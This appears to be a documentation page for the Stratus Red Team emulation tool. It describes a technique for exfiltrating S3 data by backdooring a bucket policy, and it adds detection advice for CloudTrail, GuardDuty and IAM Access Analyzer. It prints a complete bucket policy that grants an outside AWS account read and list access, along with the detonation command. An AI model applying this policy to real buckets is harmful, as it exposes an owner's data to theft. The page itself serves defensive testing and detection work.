Skip to content

Backdoor an S3 Bucket via its Bucket Policy

idempotent

Platform: AWS

MITRE ATT&CK Tactics

  • Exfiltration

Description

Exfiltrates data from an S3 bucket by backdooring its Bucket Policy to allow access from an external, fictitious AWS account.

Warm-up:

  • Create an S3 bucket.

Detonation:

  • Backdoor the S3 Bucket Policy by setting the following Bucket Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::193672423079:root"
      },
      "Action": [
        "s3:GetObject",
        "s3:GetBucketLocation",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::%s/*",
        "arn:aws:s3:::%s"
      ]
    }
  ]
}

Instructions

Detonate with Stratus Red Team
stratus detonate aws.exfiltration.s3-backdoor-bucket-policy

Detection

  • Using CloudTrail's PutBucketPolicy event.

  • Through GuardDuty's Policy:S3/BucketAnonymousAccessGranted finding, if the S3 bucket was made public (and not only shared with an attacker-controlled AWS account).

  • Through IAM Access Analyzer, which generates a finding when an S3 bucket is made public or accessible from another account.